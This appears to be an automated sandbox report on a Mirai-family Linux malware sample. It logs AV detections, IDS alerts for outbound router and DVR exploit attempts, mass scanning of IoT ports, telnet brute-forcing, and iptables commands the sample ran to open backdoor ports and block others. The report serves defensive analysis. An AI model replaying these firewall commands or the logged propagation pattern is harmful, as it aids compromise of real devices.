Linux Analysis Report bin.sh

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: bin.sh

Avira: detected

Multi AV Scanner detection for submitted file

Source: bin.sh	Metadefender: Detection: 54%			Perma Link
Source: bin.sh	ReversingLabs: Detection: 75%

Antivirus detection for dropped file

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading:

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/bin.sh (PID: 6815)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/bin.sh (PID: 6815)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:35942 -> 91.195.35.202:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45572 -> 3.221.14.87:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60680 -> 112.74.206.52:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 1.18.146.134 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 36.64.16.33 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.116.23.175 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 68.163.230.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 34.144.108.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 29.250.199.167 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.141.67.12 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 129.210.175.243 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 105.137.202.218 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 54.168.251.73 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 169.134.101.55 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 50.41.174.31 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 138.7.161.211 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.141.183.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 201.10.247.77 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.180.20.21 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 74.69.135.216 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 74.5.187.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.194.253.153 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.249.53.230 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 144.110.172.80 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 55.92.128.187 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 168.30.37.171 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 185.202.14.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.233.216.179 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 216.111.216.82 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 132.35.122.63 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 166.126.250.196 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 49.215.96.136 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 91.51.225.145 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 50.71.248.204 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 176.127.83.100 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 59.17.48.95 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 11.48.52.253 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 17.164.29.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 72.112.217.68 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 181.52.149.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.26.244.178 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 125.102.41.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 145.249.112.110 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 182.183.14.60 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 108.221.87.254 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 125.113.60.52 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 91.180.74.171 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 184.12.203.227 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 44.146.63.186 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 134.191.166.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 135.121.123.52 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 70.170.178.192 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 99.37.65.129 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 44.51.94.199 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 133.183.45.107 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.223.178.160 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 206.165.78.36 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 16.184.42.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 207.48.109.17 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 165.40.111.59 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 198.197.25.140 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 19.139.235.199 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 24.85.80.95 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.51.108.187 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 116.147.238.153 ports 1,2,3,5,7,37215

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34674
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34680
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34684
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34686
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34688
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34690
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34692
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34694
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34696
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35276
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35278
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35292
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35298
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35300
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 8443

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 6827)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6857)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT			Jump to behavior

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.20:43926 -> 149.185.53.154:81
Source: global traffic	TCP traffic: 192.168.2.20:40304 -> 155.61.123.253:81
Source: global traffic	TCP traffic: 192.168.2.20:38230 -> 105.137.202.218:49152
Source: global traffic	TCP traffic: 192.168.2.20:42082 -> 99.37.65.129:37215
Source: global traffic	TCP traffic: 192.168.2.20:33594 -> 175.141.183.193:37215
Source: global traffic	TCP traffic: 192.168.2.20:47968 -> 84.60.151.77:37215
Source: global traffic	TCP traffic: 192.168.2.20:37470 -> 132.169.224.240:8443
Source: global traffic	TCP traffic: 192.168.2.20:33484 -> 207.49.85.172:7574
Source: global traffic	TCP traffic: 192.168.2.20:52462 -> 101.215.138.244:81
Source: global traffic	TCP traffic: 192.168.2.20:46118 -> 141.139.161.123:8080
Source: global traffic	TCP traffic: 192.168.2.20:48144 -> 190.180.20.21:49152
Source: global traffic	TCP traffic: 192.168.2.20:44582 -> 97.152.141.58:8080
Source: global traffic	TCP traffic: 192.168.2.20:34278 -> 132.35.122.63:49152
Source: global traffic	TCP traffic: 192.168.2.20:42042 -> 206.66.211.183:7574
Source: global traffic	TCP traffic: 192.168.2.20:47978 -> 5.69.78.55:8443
Source: global traffic	TCP traffic: 192.168.2.20:40184 -> 138.58.82.192:8080
Source: global traffic	TCP traffic: 192.168.2.20:41086 -> 50.41.174.31:49152
Source: global traffic	TCP traffic: 192.168.2.20:52626 -> 85.233.216.179:49152
Source: global traffic	TCP traffic: 192.168.2.20:52580 -> 193.176.243.123:8080
Source: global traffic	TCP traffic: 192.168.2.20:50830 -> 59.17.48.95:37215
Source: global traffic	TCP traffic: 192.168.2.20:56092 -> 176.127.83.100:49152
Source: global traffic	TCP traffic: 192.168.2.20:39232 -> 34.144.108.84:49152
Source: global traffic	TCP traffic: 192.168.2.20:45750 -> 133.183.45.107:49152
Source: global traffic	TCP traffic: 192.168.2.20:48552 -> 43.163.194.108:8080
Source: global traffic	TCP traffic: 192.168.2.20:35468 -> 55.92.128.187:52869
Source: global traffic	TCP traffic: 192.168.2.20:48664 -> 73.227.59.34:7574
Source: global traffic	TCP traffic: 192.168.2.20:52060 -> 201.10.247.77:52869
Source: global traffic	TCP traffic: 192.168.2.20:53640 -> 1.86.24.162:5555
Source: global traffic	TCP traffic: 192.168.2.20:50032 -> 117.145.177.145:8080
Source: global traffic	TCP traffic: 192.168.2.20:60014 -> 124.193.58.88:7574
Source: global traffic	TCP traffic: 192.168.2.20:53660 -> 7.175.103.180:5555
Source: global traffic	TCP traffic: 192.168.2.20:51380 -> 103.98.158.56:81
Source: global traffic	TCP traffic: 192.168.2.20:52262 -> 135.108.6.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:33314 -> 125.113.60.52:49152
Source: global traffic	TCP traffic: 192.168.2.20:36276 -> 68.204.221.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:56462 -> 96.243.133.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:34528 -> 144.110.172.80:37215
Source: global traffic	TCP traffic: 192.168.2.20:42294 -> 5.116.203.63:8080
Source: global traffic	TCP traffic: 192.168.2.20:52428 -> 205.102.198.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:59822 -> 55.221.175.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:48250 -> 159.239.202.226:5555
Source: global traffic	TCP traffic: 192.168.2.20:55236 -> 1.229.187.151:81
Source: global traffic	TCP traffic: 192.168.2.20:35456 -> 185.69.187.126:7574
Source: global traffic	TCP traffic: 192.168.2.20:42480 -> 189.6.77.233:81
Source: global traffic	TCP traffic: 192.168.2.20:38974 -> 91.51.225.145:52869
Source: global traffic	TCP traffic: 192.168.2.20:34920 -> 5.186.7.92:81
Source: global traffic	TCP traffic: 192.168.2.20:41574 -> 31.116.224.12:8443
Source: global traffic	TCP traffic: 192.168.2.20:52566 -> 49.215.96.136:49152
Source: global traffic	TCP traffic: 192.168.2.20:54116 -> 50.71.248.204:37215
Source: global traffic	TCP traffic: 192.168.2.20:40006 -> 117.41.103.207:8080
Source: global traffic	TCP traffic: 192.168.2.20:34908 -> 57.51.108.187:37215
Source: global traffic	TCP traffic: 192.168.2.20:52718 -> 151.214.152.36:81
Source: global traffic	TCP traffic: 192.168.2.20:42630 -> 210.87.19.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:45752 -> 52.46.146.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:46532 -> 163.196.185.185:5555
Source: global traffic	TCP traffic: 192.168.2.20:50614 -> 138.7.59.44:49152
Source: global traffic	TCP traffic: 192.168.2.20:58240 -> 6.141.67.12:52869
Source: global traffic	TCP traffic: 192.168.2.20:54036 -> 182.183.14.60:49152
Source: global traffic	TCP traffic: 192.168.2.20:33700 -> 213.37.141.115:5555
Source: global traffic	TCP traffic: 192.168.2.20:51012 -> 89.150.101.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:47588 -> 126.180.188.226:7574
Source: global traffic	TCP traffic: 192.168.2.20:33908 -> 62.250.214.124:7574
Source: global traffic	TCP traffic: 192.168.2.20:36634 -> 44.146.63.186:37215
Source: global traffic	TCP traffic: 192.168.2.20:45226 -> 48.216.208.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:44272 -> 203.9.163.102:8443
Source: global traffic	TCP traffic: 192.168.2.20:51112 -> 198.153.109.170:81
Source: global traffic	TCP traffic: 192.168.2.20:48618 -> 203.250.146.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:38448 -> 135.121.123.52:49152
Source: global traffic	TCP traffic: 192.168.2.20:37272 -> 170.223.178.160:37215
Source: global traffic	TCP traffic: 192.168.2.20:47030 -> 16.184.42.108:52869
Source: global traffic	TCP traffic: 192.168.2.20:60426 -> 181.52.149.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:49010 -> 159.14.216.23:8443
Source: global traffic	TCP traffic: 192.168.2.20:34130 -> 74.5.187.133:52869
Source: global traffic	TCP traffic: 192.168.2.20:38078 -> 58.217.250.57:8443
Source: global traffic	TCP traffic: 192.168.2.20:37196 -> 105.159.210.4:8080
Source: global traffic	TCP traffic: 192.168.2.20:39148 -> 71.13.95.149:8080
Source: global traffic	TCP traffic: 192.168.2.20:43494 -> 36.64.16.33:49152
Source: global traffic	TCP traffic: 192.168.2.20:37108 -> 47.253.230.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:49774 -> 166.126.250.196:49152
Source: global traffic	TCP traffic: 192.168.2.20:34880 -> 142.135.25.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:48738 -> 168.30.37.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:51516 -> 173.102.232.221:5555
Source: global traffic	TCP traffic: 192.168.2.20:37574 -> 111.122.147.188:8080
Source: global traffic	TCP traffic: 192.168.2.20:55336 -> 64.136.60.132:8443
Source: global traffic	TCP traffic: 192.168.2.20:42150 -> 31.184.54.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:60296 -> 111.107.14.55:8080
Source: global traffic	TCP traffic: 192.168.2.20:51774 -> 24.85.80.95:49152
Source: global traffic	TCP traffic: 192.168.2.20:43044 -> 129.210.175.243:37215
Source: global traffic	TCP traffic: 192.168.2.20:36094 -> 36.238.254.86:8080
Source: global traffic	TCP traffic: 192.168.2.20:57624 -> 201.13.139.241:8080
Source: global traffic	TCP traffic: 192.168.2.20:60788 -> 96.13.10.218:8443
Source: global traffic	TCP traffic: 192.168.2.20:34778 -> 103.69.161.106:7574
Source: global traffic	TCP traffic: 192.168.2.20:42968 -> 117.47.195.144:8080
Source: global traffic	TCP traffic: 192.168.2.20:48084 -> 134.191.166.14:49152
Source: global traffic	TCP traffic: 192.168.2.20:53088 -> 148.213.108.240:7574
Source: global traffic	TCP traffic: 192.168.2.20:52810 -> 125.221.235.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:39682 -> 206.165.78.36:37215
Source: global traffic	TCP traffic: 192.168.2.20:56940 -> 116.142.239.53:8443
Source: global traffic	TCP traffic: 192.168.2.20:60816 -> 11.248.186.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:60522 -> 62.174.49.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:45898 -> 153.220.50.14:81
Source: global traffic	TCP traffic: 192.168.2.20:46192 -> 36.5.246.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:51322 -> 106.83.13.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:45798 -> 54.168.251.73:49152
Source: global traffic	TCP traffic: 192.168.2.20:42262 -> 72.112.217.68:52869
Source: global traffic	TCP traffic: 192.168.2.20:36422 -> 133.89.177.67:8080
Source: global traffic	TCP traffic: 192.168.2.20:33958 -> 21.90.118.51:7574
Source: global traffic	TCP traffic: 192.168.2.20:46510 -> 118.149.161.126:8443
Source: global traffic	TCP traffic: 192.168.2.20:43272 -> 23.181.68.106:7574
Source: global traffic	TCP traffic: 192.168.2.20:48896 -> 67.229.204.206:8080
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 193.28.36.33:8080
Source: global traffic	TCP traffic: 192.168.2.20:35272 -> 9.197.125.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:40834 -> 184.12.203.227:49152
Source: global traffic	TCP traffic: 192.168.2.20:43326 -> 185.202.14.118:49152
Source: global traffic	TCP traffic: 192.168.2.20:55580 -> 80.207.49.226:8080
Source: global traffic	TCP traffic: 192.168.2.20:58080 -> 29.250.199.167:49152
Source: global traffic	TCP traffic: 192.168.2.20:43824 -> 32.96.131.217:5555
Source: global traffic	TCP traffic: 192.168.2.20:46416 -> 125.102.41.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:45010 -> 121.128.113.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 205.57.172.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:44042 -> 198.197.25.140:52869
Source: global traffic	TCP traffic: 192.168.2.20:53916 -> 124.122.67.136:81
Source: global traffic	TCP traffic: 192.168.2.20:34192 -> 207.48.109.17:37215
Source: global traffic	TCP traffic: 192.168.2.20:45514 -> 33.170.253.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:34956 -> 44.51.94.199:52869
Source: global traffic	TCP traffic: 192.168.2.20:33406 -> 82.26.244.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:48488 -> 215.176.205.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:37762 -> 138.65.229.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:35378 -> 56.164.61.40:8080
Source: global traffic	TCP traffic: 192.168.2.20:44354 -> 14.6.225.98:7574
Source: global traffic	TCP traffic: 192.168.2.20:52364 -> 108.221.87.254:37215
Source: global traffic	TCP traffic: 192.168.2.20:48882 -> 155.116.23.175:52869
Source: global traffic	TCP traffic: 192.168.2.20:45642 -> 96.137.22.200:7574
Source: global traffic	TCP traffic: 192.168.2.20:36158 -> 70.170.178.192:37215
Source: global traffic	TCP traffic: 192.168.2.20:45870 -> 59.167.100.92:8443
Source: global traffic	TCP traffic: 192.168.2.20:42284 -> 28.65.109.23:8443
Source: global traffic	TCP traffic: 192.168.2.20:46744 -> 74.69.135.216:52869
Source: global traffic	TCP traffic: 192.168.2.20:56872 -> 1.18.146.134:49152
